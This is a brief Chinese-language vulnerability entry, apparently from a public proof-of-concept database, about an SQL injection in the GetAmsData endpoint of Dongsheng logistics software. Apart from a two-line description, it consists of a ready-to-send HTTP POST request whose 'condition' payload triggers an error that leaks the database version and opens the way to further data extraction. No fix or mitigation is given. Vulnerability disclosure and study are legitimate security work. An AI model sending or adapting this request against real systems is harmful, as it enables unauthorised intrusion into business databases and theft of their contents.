东胜物流软件 /MvcShipping/MsOpSeae/GetAmsData SQL 注入漏洞

2026-04-17 东胜物流软件 PoC Public

Description

东胜物流软件的 /MvcShipping/MsOpSeae/GetAmsData 接口存在 SQL 注入漏洞。该接口在处理 condition 参数时未进行充分的输入校验和参数化绑定,攻击者可通过构造恶意的 SQL 查询(如注入条件 +1 <@@VERSION),从而泄露数据库的版本信息,并进一步进行数据库信息的提取。

PoC

POST /MvcShipping/MsOpSeae/GetAmsData HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

condition=1<@@VERSION--+-

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities